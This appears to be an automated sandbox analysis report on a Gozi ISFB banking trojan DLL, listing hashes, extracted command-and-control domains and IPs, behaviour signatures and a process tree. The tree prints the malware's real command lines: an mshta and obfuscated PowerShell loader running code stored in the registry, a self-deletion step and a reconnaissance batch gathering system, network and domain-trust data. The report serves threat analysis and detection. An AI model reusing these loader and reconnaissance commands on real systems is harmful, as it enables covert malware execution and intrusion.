gozi_ifsb | 25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1

Analysis

max time kernel
151s
max time network
145s
platform
windows10_x64
resource
win10-en-20211208
submitted
14-12-2021 09:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

61b85f75e6a7c.dll
Size

1.7MB
MD5

26788bdf519813ff2600570a5c8e23d9
SHA1

44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256

25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
SHA512

54cad6bdd1ef350a02e6e3645db3fc3f1fadb385c7dcf5eeacf20a8b1d7fbc42aa3cb88d320fda63a7224b2507e7b84e3942cb54fb61cc398800ec95f6f2d505

Score

10^/10

gozi_ifsb 8899 banker trojan

Malware Config

Extracted

Family

gozi_ifsb

Botnet

8899

microsoft.com/windowsdisabler

windows.update3.com

berukoneru.website

gerukoneru.website

fortunarah.com

assets.msn.com

http://microsoft.com

79.110.52.217

79.110.52.215

45.9.20.190

45.9.20.128

aerukoneru.site

serukoneru.site

yerukoneru.site

karfaganda.com

Attributes

base_path
/tire/
build
260222
dga_season
10
exe_type
loader
extension
.eta
server_id
12

rsa_pubkey.plain

serpent.plain

rsa_pubkey.plain

Signatures

Gozi, Gozi IFSB
Gozi ISFB is a well-known and widely distributed banking trojan.
banker trojan gozi_ifsb

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3232 set thread context of 3068	3232	powershell.exe	Explorer.EXE
PID 3068 set thread context of 3592	3068	Explorer.EXE	RuntimeBroker.exe
PID 3068 set thread context of 2528	3068	Explorer.EXE	cmd.exe
PID 2528 set thread context of 2140	2528	cmd.exe	PING.EXE
PID 3068 set thread context of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 set thread context of 3676	3068	Explorer.EXE	WinMail.exe
PID 3068 set thread context of 900	3068	Explorer.EXE	cmd.exe
PID 3068 set thread context of 1276	3068	Explorer.EXE	cmd.exe

Drops file in Windows directory 1 IoCs

Processes:

regsvr32.exe

description ioc process

File opened for modification C:\Windows\ regsvr32.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2248 2416 WerFault.exe regsvr32.exe
Discovers systems in the same network 1 TTPs 3 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exenet.exe

pid process

1656 net.exe
2424 net.exe
2236 net.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

3664 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

3644 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

2984 systeminfo.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2140 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

2140 PING.EXE

description	ioc	process
File opened for modification	C:\Windows\	regsvr32.exe

pid	pid_target	process	target process
2248	2416	WerFault.exe	regsvr32.exe

pid	process
1656	net.exe
2424	net.exe
2236	net.exe

pid	process
3664	tasklist.exe

pid	process
3644	ipconfig.exe

pid	process
2984	systeminfo.exe

pid	process
2140	PING.EXE

pid	process
2140	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

regsvr32.exepowershell.exeExplorer.EXEWerFault.exe

pid	process
2416	regsvr32.exe
2416	regsvr32.exe
3232	powershell.exe
3232	powershell.exe
3232	powershell.exe
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
2248	WerFault.exe
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3068 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

3232 powershell.exe
3068 Explorer.EXE
3068 Explorer.EXE
2528 cmd.exe
3068 Explorer.EXE
3068 Explorer.EXE
3068 Explorer.EXE
3068 Explorer.EXE

pid	process
3068	Explorer.EXE

pid	process
3232	powershell.exe
3068	Explorer.EXE
3068	Explorer.EXE
2528	cmd.exe
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE
3068	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 19 IoCs

Processes:

powershell.exeExplorer.EXEWerFault.exetasklist.exe

description	pid	process
Token: SeDebugPrivilege	3232	powershell.exe
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeRestorePrivilege	2248	WerFault.exe
Token: SeBackupPrivilege	2248	WerFault.exe
Token: SeDebugPrivilege	2248	WerFault.exe
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE
Token: SeDebugPrivilege	3664	tasklist.exe
Token: SeShutdownPrivilege	3068	Explorer.EXE
Token: SeCreatePagefilePrivilege	3068	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3068 Explorer.EXE

pid	process
3068	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

regsvr32.exemshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.execmd.execmd.exe

description	pid	process	target process
PID 64 wrote to memory of 2416	64	regsvr32.exe	regsvr32.exe
PID 64 wrote to memory of 2416	64	regsvr32.exe	regsvr32.exe
PID 64 wrote to memory of 2416	64	regsvr32.exe	regsvr32.exe
PID 4024 wrote to memory of 3232	4024	mshta.exe	powershell.exe
PID 4024 wrote to memory of 3232	4024	mshta.exe	powershell.exe
PID 3232 wrote to memory of 200	3232	powershell.exe	csc.exe
PID 3232 wrote to memory of 200	3232	powershell.exe	csc.exe
PID 200 wrote to memory of 1008	200	csc.exe	cvtres.exe
PID 200 wrote to memory of 1008	200	csc.exe	cvtres.exe
PID 3232 wrote to memory of 752	3232	powershell.exe	csc.exe
PID 3232 wrote to memory of 752	3232	powershell.exe	csc.exe
PID 752 wrote to memory of 2240	752	csc.exe	cvtres.exe
PID 752 wrote to memory of 2240	752	csc.exe	cvtres.exe
PID 3232 wrote to memory of 3068	3232	powershell.exe	Explorer.EXE
PID 3232 wrote to memory of 3068	3232	powershell.exe	Explorer.EXE
PID 3232 wrote to memory of 3068	3232	powershell.exe	Explorer.EXE
PID 3232 wrote to memory of 3068	3232	powershell.exe	Explorer.EXE
PID 3068 wrote to memory of 3592	3068	Explorer.EXE	RuntimeBroker.exe
PID 3068 wrote to memory of 3592	3068	Explorer.EXE	RuntimeBroker.exe
PID 3068 wrote to memory of 2528	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 2528	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 2528	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 3592	3068	Explorer.EXE	RuntimeBroker.exe
PID 3068 wrote to memory of 3592	3068	Explorer.EXE	RuntimeBroker.exe
PID 3068 wrote to memory of 2528	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 2528	3068	Explorer.EXE	cmd.exe
PID 2528 wrote to memory of 2140	2528	cmd.exe	PING.EXE
PID 2528 wrote to memory of 2140	2528	cmd.exe	PING.EXE
PID 2528 wrote to memory of 2140	2528	cmd.exe	PING.EXE
PID 2528 wrote to memory of 2140	2528	cmd.exe	PING.EXE
PID 2528 wrote to memory of 2140	2528	cmd.exe	PING.EXE
PID 3068 wrote to memory of 1036	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1036	3068	Explorer.EXE	cmd.exe
PID 1036 wrote to memory of 2984	1036	cmd.exe	systeminfo.exe
PID 1036 wrote to memory of 2984	1036	cmd.exe	systeminfo.exe
PID 3068 wrote to memory of 1540	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1540	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3676	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3676	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3676	3068	Explorer.EXE	WinMail.exe
PID 1540 wrote to memory of 3644	1540	cmd.exe	ipconfig.exe
PID 1540 wrote to memory of 3644	1540	cmd.exe	ipconfig.exe
PID 3068 wrote to memory of 768	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 768	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3316	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3676	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 3676	3068	Explorer.EXE	WinMail.exe
PID 3068 wrote to memory of 2368	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 2368	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1276	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1276	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1276	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1276	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 1276	3068	Explorer.EXE	cmd.exe
PID 3068 wrote to memory of 900	3068	Explorer.EXE	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3068

C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\61b85f75e6a7c.dll
2⤵
- Suspicious use of WriteProcessMemory
PID:64

C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\61b85f75e6a7c.dll
3⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
PID:2416

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 768
4⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2248

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>H4yh='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(H4yh).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"
2⤵
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name kwinrhi -value gp; new-alias -name jwrwadsf -value iex; jwrwadsf ([System.Text.Encoding]::ASCII.GetString((kwinrhi "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3232

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lbcjun3j\lbcjun3j.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:200

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA80.tmp" "c:\Users\Admin\AppData\Local\Temp\lbcjun3j\CSC269A66B8FE554B03BADB6D6F45721C.TMP"
5⤵
PID:1008

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\h0tj3bhw\h0tj3bhw.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCBD7.tmp" "c:\Users\Admin\AppData\Local\Temp\h0tj3bhw\CSC2D1D9AB0ADF64F4E87697367722D44E0.TMP"
5⤵
PID:2240

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61b85f75e6a7c.dll"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:2528

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:2140

C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1036

C:\Windows\system32\systeminfo.exe
systeminfo.exe
3⤵
- Gathers system information
PID:2984

C:\Windows\system32\cmd.exe
cmd /C "ipconfig /all >> C:\Users\Admin\AppData\Local\Temp\E1BD.bin1"
2⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\system32\ipconfig.exe
ipconfig /all
3⤵
- Gathers network information
PID:3644

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:3676

C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
2⤵
PID:3316

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\E1BD.bin1"
2⤵
PID:768

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\E1BD.bin1 > C:\Users\Admin\AppData\Local\Temp\E1BD.bin & del C:\Users\Admin\AppData\Local\Temp\E1BD.bin1"
2⤵
PID:2368

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:1276

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:900

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:2924

C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3204

C:\Windows\system32\net.exe
net view
3⤵
- Discovers systems in the same network
PID:1656

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:2460

C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3184

C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
3⤵
PID:3672

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1552

C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1100

C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
3⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3664

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3004

C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3708

C:\Windows\system32\driverquery.exe
driverquery.exe
3⤵
PID:232

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:2016

C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1360

C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
3⤵
PID:1524

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1372

C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1464

C:\Windows\system32\net.exe
net config workstation
3⤵
PID:3520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
4⤵
PID:2376

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1240

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:2100

C:\Windows\system32\nltest.exe
nltest /domain_trusts
3⤵
PID:1384

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:4012

C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:2364

C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
3⤵
PID:624

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:620

C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:732

C:\Windows\system32\net.exe
net view /all /domain
3⤵
- Discovers systems in the same network
PID:2424

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3160

C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:948

C:\Windows\system32\net.exe
net view /all
3⤵
- Discovers systems in the same network
PID:2236

C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:3648

C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\C178.bin1 > C:\Users\Admin\AppData\Local\Temp\C178.bin & del C:\Users\Admin\AppData\Local\Temp\C178.bin1"
2⤵
PID:1132

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3592

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Remote System Discovery

T1018

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\C178.bin
MD5
0d48a101910f83c4d0e343205e4b655a

SHA1
21bf220e6718a0e79372d303b1d555482eb31ccf

SHA256
cc56152945f38e9755b34f6134acc0baf1556625a1ff93cdfbe03b7aa7423f6a

SHA512
0d7799ef79ffcc6913c2ddaee3334b907d18eec9a238462e2bfe4bba70f494c0aaa5aaba00727d2ab427a721afb1f371a41ab21e99b197e652d2d7d35e71be09

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
74f702d853fc58912a67fd096deb7fd1

SHA1
3966651480e77641abec403693e1ee9962f4265e

SHA256
8a697bb9d3bd1e39e6e9b0edcab537855363a1dea7b5759588cc853bdefc17b4

SHA512
4cc60f6692c30baf756205d77f8bc56464186d995fc0d474e80de22fc47274480bb8b3ad79572f59a58537f0331b6fac7ffe88983dcc1a9c2dc33fcfa6040b22

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
b1aff16c801c1152b05a9171a9d2321f

SHA1
ad88ed232d8bcf27a8a4f5df682b6ad4e3e26db1

SHA256
2cf2cb9e785ef556edda80ecbfc38e4b04d76e73926ebe7bf0b224df192a364c

SHA512
542bdefb2ff42497de257d1aa3cf6991c88cb5a0ddc5120e66a5346e36f955bbeeaadbff114cd0406a4e5e438175a0d3c43df500c4dce43de0633e41f64c2d5c

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
680668406d883dcdd9b66db2fb6ddfa3

SHA1
baaa899f8e1662d752f8f39b6ec9c0e7ee036948

SHA256
1b52fee43f3fc7af3a712a2c476716a7bd47c171af8bc8d3ae2060a7abec69e3

SHA512
760b51d67009a196fb797d712b242b59e6db0b018b71a75e42d78242f575065ee43e42ed0715e3c8ce846874982d7d6b0896dcc1ad8e70f1893bf41e35f903f1

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
f9e55fc5bcb7001feb2dbde2bbf3df56

SHA1
0baeee31430c85368fd4929ef3f9a50990b60191

SHA256
1bc9b2394f20a10ea197d76433ca0bf4eca27375d64389db2b7f65c74c6216c6

SHA512
db016e669381ab7829ef4576d250c48ea9827b3af96c6cdb024d71f83614166a00a2831f4e0c8e587965c73b2eff072046bcfd2b7b2b3a19eb9779cf1bb8c1aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
1be55581769d93a8a3a3a49079379757

SHA1
75c77986fd622fb694e01dd6cb19ebb69c5b8306

SHA256
6b1b5bc40205e24a643de45bdd5c9c58045ea0f3bb9493f0c7605a0965b2b80d

SHA512
33b6a26a22c3e5bac4d6d30aecaf613af52a4301903df4a8e856bd7624ed3679afbfafb09614f68296407cff83e7ae6ea6ad0d4041f44d027a56e0623d24fe91

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
1be55581769d93a8a3a3a49079379757

SHA1
75c77986fd622fb694e01dd6cb19ebb69c5b8306

SHA256
6b1b5bc40205e24a643de45bdd5c9c58045ea0f3bb9493f0c7605a0965b2b80d

SHA512
33b6a26a22c3e5bac4d6d30aecaf613af52a4301903df4a8e856bd7624ed3679afbfafb09614f68296407cff83e7ae6ea6ad0d4041f44d027a56e0623d24fe91

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
0ce6368144e168eaf6bee27557428086

SHA1
4b23bf46220fb8906d96a01434298ddcb9f6f382

SHA256
e8876d10d55b3c891384cda2eb2be5f54d6085eb783fc6ed377ded2ccb8e814c

SHA512
cbba3491c5fba60253474e78470bab5e42304cfdb86e64ca3553191af1b8b8e412a7dfe17f03e677dfd89772de8ff2331f04b7b91f684c3bff4dad6d2b8f7d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
0ce6368144e168eaf6bee27557428086

SHA1
4b23bf46220fb8906d96a01434298ddcb9f6f382

SHA256
e8876d10d55b3c891384cda2eb2be5f54d6085eb783fc6ed377ded2ccb8e814c

SHA512
cbba3491c5fba60253474e78470bab5e42304cfdb86e64ca3553191af1b8b8e412a7dfe17f03e677dfd89772de8ff2331f04b7b91f684c3bff4dad6d2b8f7d80

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
44b4e977e18e5ca6c1a7b16e5bbc5700

SHA1
c67589ef032ddce07a4a981c7a25c509bf55aee6

SHA256
afa9985d4db9d131294003aae4a677ee1350996c67db6ae83f13f748bf52ff25

SHA512
a448d54252756f04393df94bd98ea214ec1d66f7a988303c5ad0202db8f3812fd0d5896f6cf41cf0a95d38abda5f02fcbe7a15fef93d315da9e7ed6d2813290b

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
44b4e977e18e5ca6c1a7b16e5bbc5700

SHA1
c67589ef032ddce07a4a981c7a25c509bf55aee6

SHA256
afa9985d4db9d131294003aae4a677ee1350996c67db6ae83f13f748bf52ff25

SHA512
a448d54252756f04393df94bd98ea214ec1d66f7a988303c5ad0202db8f3812fd0d5896f6cf41cf0a95d38abda5f02fcbe7a15fef93d315da9e7ed6d2813290b

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
683f0e0bb34f4da8119033c4d5e4c765

SHA1
e30864f97a3ea7599e1a8588d858854ddc50ca0f

SHA256
a1c6f3f342b52d2b46c99d4d6bcd9c97912424151f838b418610889d3ea58f03

SHA512
ea8bf4e9c4eff621e50df668ed7a055ff6cddb6d2cb027bce97467f03ffa4fa0287ad645592cdafaef084e808223673cd0b96d3dd13c0849d64d94938d14d7d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
683f0e0bb34f4da8119033c4d5e4c765

SHA1
e30864f97a3ea7599e1a8588d858854ddc50ca0f

SHA256
a1c6f3f342b52d2b46c99d4d6bcd9c97912424151f838b418610889d3ea58f03

SHA512
ea8bf4e9c4eff621e50df668ed7a055ff6cddb6d2cb027bce97467f03ffa4fa0287ad645592cdafaef084e808223673cd0b96d3dd13c0849d64d94938d14d7d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
2e117ccc6653bfcfc55b949da19fbbc5

SHA1
ad4317bfac4c90d5981b9305e0c3650ccac8f005

SHA256
4f22a76cd99897df7f56ee45f58d0929207b5e59b1598f43be3b0ae5a96f9d2b

SHA512
294e26189adc13de9dd339900c59f3bbd7e163d227081c691f25336b75c37270493173efbf9d051fd52a89afb670d8a960694d7771d71306d4a11575a268ca36

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
2e117ccc6653bfcfc55b949da19fbbc5

SHA1
ad4317bfac4c90d5981b9305e0c3650ccac8f005

SHA256
4f22a76cd99897df7f56ee45f58d0929207b5e59b1598f43be3b0ae5a96f9d2b

SHA512
294e26189adc13de9dd339900c59f3bbd7e163d227081c691f25336b75c37270493173efbf9d051fd52a89afb670d8a960694d7771d71306d4a11575a268ca36

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
1511ded193b4af8b4d4db18c91c4675b

SHA1
4b62849381d70dd1f67186ad3b81c8b23f9b24e5

SHA256
b48bddeea92f118b5fef184d4350789834730ee28473262a3c5373e7f3456eac

SHA512
f231d91af0354be9c97a2e0e3810e186d6b10a52fd9281e7f715b0f8bcbacc6c64f7a0caa08635fd5a9a862ad7cc56672490ef6b7f878d86bed0fd8ed4e75350

Download Submit
C:\Users\Admin\AppData\Local\Temp\C178.bin1
MD5
832891f4acf2b05e67e2644fd9939219

SHA1
4655f698f65d0e34508aa9f6e34e8991c6b0d4ff

SHA256
13c7899a0c20201e8ac54c2191e4aa9bb5714d460897cc4529772f3600e8e498

SHA512
